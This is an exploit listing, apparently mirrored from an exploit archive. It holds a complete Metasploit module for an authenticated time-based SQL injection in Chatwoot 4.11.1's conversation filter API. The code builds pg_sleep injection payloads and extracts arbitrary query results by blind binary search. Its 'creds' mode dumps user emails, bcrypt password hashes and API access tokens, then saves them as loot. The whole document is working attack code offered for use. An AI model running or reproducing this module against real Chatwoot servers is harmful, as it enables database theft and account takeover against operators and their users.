Share
## https://sploitus.com/exploit?id=PACKETSTORM:223093
==================================================================================================================================
    | # Title     : Chatwoot 4.11.1 FilterService SQL Injection Module for Authenticated Exposure Validation and Database Extraction |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.chatwoot.com                                                                                         |
    ==================================================================================================================================
    
    [+] Summary    :  module targets an authenticated SQL injection vulnerability in the conversation filtering functionality of Chatwoot instances up to version 4.11.1.
    
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::Report
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Chatwoot SQL Injection (CVE-CVE-2026-44706) - FilterService#lt_gt_filter',
            'Description' => %q{
              This module exploits a time-based SQL injection vulnerability in Chatwoot
              versions <= 4.11.1. The vulnerability exists in the conversation filter
              functionality, allowing an authenticated attacker to execute arbitrary
              SQL queries, extract sensitive data, and retrieve user credentials.
            },
            'Author' => ['indoushka'],
            'License' => MSF_LICENSE,
            'References' => [
              ['URL', 'https://hakaisecurity.io'],
              ['CVE', 'CVE-2026-44706'] 
            ],
            'DisclosureDate' => '2026-06-09',
            'Platform' => 'ruby',
            'Arch' => ARCH_CMD,
            'Targets' => [['Automatic', {}]],
            'DefaultTarget' => 0,
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS]
            }
          )
        )
    
        register_options([
          OptString.new('TARGETURI', [true, 'Base path for Chatwoot', '/']),
          OptString.new('API_TOKEN', [true, 'Chatwoot API access token', '']),
          OptInt.new('ACCOUNT_ID', [true, 'Target account ID', 1]),
          OptEnum.new('ACTION', [true, 'Action to perform', 'check', ['check', 'timebased', 'extract', 'creds']]),
          OptString.new('SQL_QUERY', [false, 'SQL query for extract mode', 'SELECT version()']),
          OptInt.new('MAX_LEN', [false, 'Maximum string length for extraction', 200]),
          OptInt.new('SLEEP_TIME', [false, 'Time in seconds for sleep-based injection', 2]),
          OptFloat.new('THRESHOLD', [false, 'Time threshold for detecting sleep (seconds)', 1.5])
        ])
      end
    
      def sleep_time
        datastore['SLEEP_TIME']
      end
    
      def threshold
        datastore['THRESHOLD']
      end
    
      def build_payload(injected_sql)
        value = "2024-01-01'::date #{injected_sql} 'epoch'::date > '2024-01-01"
        {
          'payload' => [
            {
              'attribute_key' => 'created_at',
              'filter_operator' => 'is_greater_than',
              'values' => [value],
              'query_operator' => nil
            }
          ]
        }
      end
    
      def send_filter_request(payload, timeout = 60)
        uri = normalize_uri(target_uri.path, "/api/v1/accounts/#{datastore['ACCOUNT_ID']}/conversations/filter")
        
        res = send_request_cgi(
          'method' => 'POST',
          'uri' => uri,
          'ctype' => 'application/json',
          'headers' => {
            'api_access_token' => datastore['API_TOKEN']
          },
          'data' => payload.to_json,
          'timeout' => timeout
        )
        
        res
      rescue ::Rex::ConnectionError, ::Rex::TimeoutError => e
        print_error("Request failed: #{e.message}")
        nil
      end
    
      def blind_check(condition)
        sqli = "AND (SELECT CASE WHEN (#{condition}) THEN pg_sleep(#{sleep_time}) ELSE pg_sleep(0) END)::text != 'x' OR"
        payload = build_payload(sqli)
        
        start_time = Time.now
        send_filter_request(payload, sleep_time + 30)
        elapsed = Time.now - start_time
        
        elapsed >= threshold
      end
    
      def extract_int(expression, low = 0, high = 10000)
        while low <= high
          mid = (low + high) / 2
          
          if blind_check("(#{expression}) = #{mid}")
            return mid
          elsif blind_check("(#{expression}) > #{mid}")
            low = mid + 1
          else
            high = mid - 1
          end
        end
        nil
      end
    
      def extract_string(expression, max_len = 200, charset = nil)
        charset ||= (('a'..'z').to_a + ('A'..'Z').to_a + ('0'..'9').to_a + 
                     ['@', '.', '_', '-', ':', '$', '/', ' ', '!', '#', '%', '^', '&', '*',
                      '(', ')', '+', '=', '[', ']', '{', '}', '|', ';', "'", ',', '<', '>',
                      '?', '~', '`', '"', '\\'])
        
        length = extract_int("length((#{expression})::text)", 0, max_len)
        return '' unless length
        
        print_status("Extracting #{length} characters...")
        
        result = ''
        (1..length).each do |pos|
          found = false
          charset.each do |ch|
            esc = ch.gsub("'", "''")
            condition = "substring((#{expression})::text,#{pos},1) = '#{esc}'"
            
            if blind_check(condition)
              result << ch
              print(ch)
              found = true
              break
            end
          end
          
          result << '?' unless found
          print('?') unless found
        end
        
        print_line
        result
      end
    
      def check_vulnerability
        print_status("Checking vulnerability with OR TRUE bypass...")
        normal_payload = {
          'payload' => [
            {
              'attribute_key' => 'created_at',
              'filter_operator' => 'is_greater_than',
              'values' => ['2099-01-01'],
              'query_operator' => nil
            }
          ]
        }
        
        normal_res = send_filter_request(normal_payload)
        return false unless normal_res&.code == 200
        normal_count = JSON.parse(normal_res.body).dig('meta', 'all_count') || 0
        malicious_res = send_filter_request(build_payload('OR TRUE OR'))
        return false unless malicious_res&.code == 200
        malicious_count = JSON.parse(malicious_res.body).dig('meta', 'all_count') || 0
        
        print_status("Normal count: #{normal_count} | Malicious count: #{malicious_count}")
        
        if malicious_count > normal_count
          print_good("SQL injection confirmed!")
          return true
        else
          print_error("Inconclusive - target may not be vulnerable")
          return false
        end
      end
    
      def timebased_test
        print_status("Testing time-based injection...")
        start_time = Time.now
        send_filter_request(build_payload("AND (SELECT pg_sleep(0))::text != 'x' OR"))
        base_time = Time.now - start_time
        print_status("Baseline time: #{'%.2f' % base_time}s")
        start_time = Time.now
        send_filter_request(build_payload("AND (SELECT pg_sleep(3))::text != 'x' OR"))
        sleep_time_actual = Time.now - start_time
        print_status("Sleep(3) time: #{'%.2f' % sleep_time_actual}s")
        
        delta = sleep_time_actual - base_time
        print_status("Delta: #{'%.2f' % delta}s")
        
        if delta >= 2.5
          print_good("Time-based injection confirmed!")
        else
          print_error("Time-based injection may not be exploitable")
        end
      end
    
      def extract_data
        query = datastore['SQL_QUERY']
        max_len = datastore['MAX_LEN']
        
        print_status("Extracting: #{query}")
        result = extract_string(query, max_len)
        
        if result.present?
          print_good("Result: #{result}")
          store_loot('chatwoot_sql_extract', 'text/plain', rhost, result, 'sql_extract.txt', "Extracted SQL query result")
        else
          print_error("Extraction failed")
        end
      end
    
      def extract_credentials
        print_status("Extracting user credentials...")
        print_status("Counting users...")
        user_count = extract_int("SELECT count(*) FROM users", 0, 100)
        
        unless user_count && user_count > 0
          print_error("Could not determine user count")
          return
        end
        
        print_good("Found #{user_count} user(s)")
        
        creds = []
        hc_charset = ('a'..'z').to_a + ('0'..'9').to_a + ['$', '2', 'a', 'b', '1', '0', '.', '/'] + ('A'..'Z').to_a
        ec_charset = ('a'..'z').to_a + ('0'..'9').to_a + ['@', '.', '_', '-', '+'] + ('A'..'Z').to_a
        
        (0...user_count).each do |i|
          print_status("Processing user #{i + 1}/#{user_count}")
          
          uid = extract_int("SELECT id FROM users ORDER BY id LIMIT 1 OFFSET #{i}", 1, 100000)
          next unless uid
          
          print_status("  ID: #{uid}")
          
          email = extract_string("SELECT email FROM users WHERE id=#{uid}", 100, ec_charset)
          password_hash = extract_string("SELECT encrypted_password FROM users WHERE id=#{uid}", 60, hc_charset)
          token = extract_string("SELECT token FROM access_tokens WHERE owner_type='User' AND owner_id=#{uid} LIMIT 1", 30)
          
          creds << {
            id: uid,
            email: email,
            hash: password_hash,
            token: token
          }
          
          print_good("  Email: #{email}") if email.present?
          print_good("  Hash: #{password_hash}") if password_hash.present?
          print_good("  Token: #{token}") if token.present?
        end
        creds.each do |cred|
          report_cred(
            user: cred[:email],
            hash: cred[:hash],
            private_type: :nonreplayable_hash,
            private_data: cred[:hash],
            jtr_format: 'bcrypt'
          ) if cred[:hash].present?
          
          report_cred(
            user: cred[:email],
            private_type: :password,
            private_data: cred[:token]
          ) if cred[:token].present?
        end
        loot_data = JSON.pretty_generate(creds)
        store_loot('chatwoot_credentials', 'application/json', rhost, loot_data, 'chatwoot_creds.json', 'Extracted credentials')
        print_good("Credentials saved to loot")
      end
      
      def report_cred(opts = {})
        return unless opts[:user].present? && opts[:private_data].present?
        
        credential_data = {
          origin_type: :service,
          module_fullname: fullname,
          username: opts[:user],
          private_data: opts[:private_data],
          private_type: opts[:private_type] || :password,
          workspace_id: myworkspace.id,
          address: rhost,
          port: rport,
          service_name: 'chatwoot',
          protocol: 'tcp'
        }
        create_credential(credential_data)
      rescue => e
        print_error("Failed to report credential: #{e.message}")
      end
    
      def run
        unless datastore['API_TOKEN'].present?
          print_error("API_TOKEN is required")
          return
        end
        print_status("Verifying authentication...")
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, '/api/v1/profile'),
          'headers' => { 'api_access_token' => datastore['API_TOKEN'] }
        )
        
        unless res && res.code == 200
          print_error("Authentication failed - invalid token or URL")
          return
        end
        begin
          profile = JSON.parse(res.body)
          print_good("Authenticated as: #{profile['name']} (#{profile['email']}) - Account ID: #{datastore['ACCOUNT_ID']}")
        rescue
          print_status("Authentication successful")
        end
        case datastore['ACTION']
        when 'check'
          check_vulnerability
        when 'timebased'
          timebased_test
        when 'extract'
          extract_data
        when 'creds'
          extract_credentials
        end
      end
    end
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================